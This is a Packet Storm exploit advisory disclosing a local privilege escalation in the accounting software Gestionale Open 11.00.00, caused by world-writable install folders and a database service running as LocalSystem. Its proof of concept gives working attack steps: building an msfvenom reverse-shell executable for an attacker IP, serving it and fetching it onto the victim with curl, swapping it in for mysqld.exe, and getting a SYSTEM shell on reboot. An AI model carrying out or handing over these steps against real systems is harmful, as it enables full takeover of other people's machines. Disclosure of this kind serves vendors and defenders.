what you don't know can hurt you

Gestionale Open 11.00.00 Privilege Escalation

Gestionale Open 11.00.00 Privilege Escalation
Posted Oct 25, 2021
Authored by Alessandro Salzano

Gestionale Open version 11.00.00 suffers from a local privilege escalation vulnerability.

tags | exploit, local
MD5 | 434cabbe8d061a0f0132600775b3babf

Gestionale Open 11.00.00 Privilege Escalation

Change Mirror Download
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64

With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.

Vendor: Gestionale Open srl.

Affected version: > 11.00.00


# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

The application also have unquoted service path issues.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:

C:\Gestionale_Open\MySQL57\bin\mysqld.exe


Details:



SERVICE_NAME: DB_GO
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem



(2) Folder permissions.
Insecure folders permissions issue:


C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)



# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start

3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close